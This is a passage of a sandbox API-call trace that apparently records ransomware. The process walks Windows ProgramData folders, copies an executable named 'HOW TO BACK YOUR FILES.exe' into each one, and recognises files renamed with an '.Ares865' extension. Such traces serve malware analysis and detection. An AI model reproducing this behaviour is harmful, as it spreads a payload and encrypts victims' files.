data\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.330] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.330] GetLastError () returned 0x0 [0090.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.330] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.330] CloseHandle (hObject=0x120) returned 1 [0090.330] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.330] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.330] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x4c7feae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c7feae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.330] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.330] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.330] lstrcpyW (in: lpString1=0x2cce4da, lpString2="resource.xml.Ares865" | out: lpString1="resource.xml.Ares865") returned="resource.xml.Ares865" [0090.330] lstrlenW (lpString="resource.xml.Ares865") returned 20 [0090.330] lstrlenW (lpString="Ares865") returned 7 [0090.330] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.330] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Device", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Device") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Device" [0090.330] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e95b0 | out: hHeap=0x2b0000) returned 1 [0090.331] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b48 | out: hHeap=0x2b0000) returned 1 [0090.331] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Device") returned 65 [0090.331] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Device" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Device") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Device" [0090.331] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.331] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Device\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\device stage\\device\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.331] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.331] GetLastError () returned 0x0 [0090.331] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.331] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.331] CloseHandle (hObject=0x120) returned 1 [0090.332] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.332] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.332] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Device\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c7feae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c7feae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.332] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.332] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.332] lstrcpyW (in: lpString1=0x2cce484, lpString2="{113527a4-45d4-4b6f-b567-97838f1b04b0}" | out: lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}") returned="{113527a4-45d4-4b6f-b567-97838f1b04b0}" [0090.332] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b48 [0090.332] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xd2) returned 0x2c8eb8 [0090.332] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b50 | out: ListHead=0x2e7710, ListEntry=0x2e7b50) returned 0x2e7b10 [0090.332] lstrcpyW (in: lpString1=0x2cce484, lpString2="{8702d817-5aad-4674-9ef3-4d3decd87120}" | out: lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}") returned="{8702d817-5aad-4674-9ef3-4d3decd87120}" [0090.332] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b68 [0090.332] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xd2) returned 0x2e87c0 [0090.332] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b70 | out: ListHead=0x2e7710, ListEntry=0x2e7b70) returned 0x2e7b50 [0090.332] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}" [0090.332] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e87c0 | out: hHeap=0x2b0000) returned 1 [0090.332] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0090.332] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}") returned 104 [0090.332] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}" [0090.332] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.332] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.333] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.333] GetLastError () returned 0x0 [0090.333] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.333] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.333] CloseHandle (hObject=0x120) returned 1 [0090.333] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.333] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.333] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x66dea660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x66dea660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.334] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.334] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.334] lstrcpyW (in: lpString1=0x2cce4d2, lpString2="background.png.Ares865" | out: lpString1="background.png.Ares865") returned="background.png.Ares865" [0090.334] lstrlenW (lpString="background.png.Ares865") returned 22 [0090.334] lstrlenW (lpString="Ares865") returned 7 [0090.334] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.334] lstrcpyW (in: lpString1=0x2cce4d2, lpString2="behavior.xml.Ares865" | out: lpString1="behavior.xml.Ares865") returned="behavior.xml.Ares865" [0090.334] lstrlenW (lpString="behavior.xml.Ares865") returned 20 [0090.334] lstrlenW (lpString="Ares865") returned 7 [0090.334] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.334] lstrcpyW (in: lpString1=0x2cce4d2, lpString2="watermark.png.Ares865" | out: lpString1="watermark.png.Ares865") returned="watermark.png.Ares865" [0090.334] lstrlenW (lpString="watermark.png.Ares865") returned 21 [0090.334] lstrlenW (lpString="Ares865") returned 7 [0090.334] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.334] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}" [0090.335] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0090.335] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b48 | out: hHeap=0x2b0000) returned 1 [0090.335] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}") returned 104 [0090.335] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}" [0090.335] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.335] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.335] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.335] GetLastError () returned 0x0 [0090.335] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.336] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.336] CloseHandle (hObject=0x120) returned 1 [0090.336] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.336] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.336] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x66eceea0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x66eceea0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.336] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.336] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.336] lstrcpyW (in: lpString1=0x2cce4d2, lpString2="background.png.Ares865" | out: lpString1="background.png.Ares865") returned="background.png.Ares865" [0090.336] lstrlenW (lpString="background.png.Ares865") returned 22 [0090.336] lstrlenW (lpString="Ares865") returned 7 [0090.336] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.336] lstrcpyW (in: lpString1=0x2cce4d2, lpString2="behavior.xml.Ares865" | out: lpString1="behavior.xml.Ares865") returned="behavior.xml.Ares865" [0090.336] lstrlenW (lpString="behavior.xml.Ares865") returned 20 [0090.336] lstrlenW (lpString="Ares865") returned 7 [0090.336] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.336] lstrcpyW (in: lpString1=0x2cce4d2, lpString2="device.png.Ares865" | out: lpString1="device.png.Ares865") returned="device.png.Ares865" [0090.336] lstrlenW (lpString="device.png.Ares865") returned 18 [0090.336] lstrlenW (lpString="Ares865") returned 7 [0090.336] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.336] lstrcpyW (in: lpString1=0x2cce4d2, lpString2="overlay.png.Ares865" | out: lpString1="overlay.png.Ares865") returned="overlay.png.Ares865" [0090.337] lstrlenW (lpString="overlay.png.Ares865") returned 19 [0090.337] lstrlenW (lpString="Ares865") returned 7 [0090.337] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.337] lstrcpyW (in: lpString1=0x2cce4d2, lpString2="superbar.png.Ares865" | out: lpString1="superbar.png.Ares865") returned="superbar.png.Ares865" [0090.337] lstrlenW (lpString="superbar.png.Ares865") returned 20 [0090.337] lstrlenW (lpString="Ares865") returned 7 [0090.337] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.337] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto" [0090.337] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0090.337] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b08 | out: hHeap=0x2b0000) returned 1 [0090.337] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto") returned 52 [0090.337] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto" [0090.337] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.337] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\crypto\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.338] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.338] GetLastError () returned 0x0 [0090.338] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.338] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.338] CloseHandle (hObject=0x120) returned 1 [0090.338] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.338] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.338] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c84ada0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c84ada0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.338] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.338] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.338] lstrcpyW (in: lpString1=0x2cce46a, lpString2="DSS" | out: lpString1="DSS") returned="DSS" [0090.338] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b08 [0090.338] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x72) returned 0x2c1408 [0090.338] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b10 | out: ListHead=0x2e7710, ListEntry=0x2e7b10) returned 0x2e7af0 [0090.338] lstrcpyW (in: lpString1=0x2cce46a, lpString2="Keys" | out: lpString1="Keys") returned="Keys" [0090.338] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b48 [0090.339] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x74) returned 0x2c1708 [0090.339] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b50 | out: ListHead=0x2e7710, ListEntry=0x2e7b50) returned 0x2e7b10 [0090.339] lstrcpyW (in: lpString1=0x2cce46a, lpString2="RSA" | out: lpString1="RSA") returned="RSA" [0090.339] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b68 [0090.339] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x72) returned 0x2c1788 [0090.339] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b70 | out: ListHead=0x2e7710, ListEntry=0x2e7b70) returned 0x2e7b50 [0090.339] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\RSA", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\RSA") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\RSA" [0090.339] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1788 | out: hHeap=0x2b0000) returned 1 [0090.339] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0090.339] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\RSA") returned 56 [0090.339] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\RSA" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\RSA") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\RSA" [0090.339] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.339] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\RSA\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\crypto\\rsa\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.340] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.340] GetLastError () returned 0x0 [0090.340] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.340] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.340] CloseHandle (hObject=0x120) returned 1 [0090.340] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.340] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.340] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\RSA\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c870f00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c870f00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.340] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.340] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.340] lstrcpyW (in: lpString1=0x2cce472, lpString2="MachineKeys" | out: lpString1="MachineKeys") returned="MachineKeys" [0090.340] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b68 [0090.340] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8a) returned 0x320fc8 [0090.340] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b70 | out: ListHead=0x2e7710, ListEntry=0x2e7b70) returned 0x2e7b50 [0090.340] lstrcpyW (in: lpString1=0x2cce472, lpString2="S-1-5-18" | out: lpString1="S-1-5-18") returned="S-1-5-18" [0090.340] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7bc8 [0090.340] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x84) returned 0x2e95b0 [0090.341] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bd0 | out: ListHead=0x2e7710, ListEntry=0x2e7bd0) returned 0x2e7b70 [0090.341] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\RSA\\S-1-5-18", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\RSA\\S-1-5-18") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\RSA\\S-1-5-18" [0090.341] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e95b0 | out: hHeap=0x2b0000) returned 1 [0090.341] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7bc8 | out: hHeap=0x2b0000) returned 1 [0090.341] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\RSA\\S-1-5-18") returned 65 [0090.341] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\RSA\\S-1-5-18" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\RSA\\S-1-5-18") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\RSA\\S-1-5-18" [0090.341] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.341] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\RSA\\S-1-5-18\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application 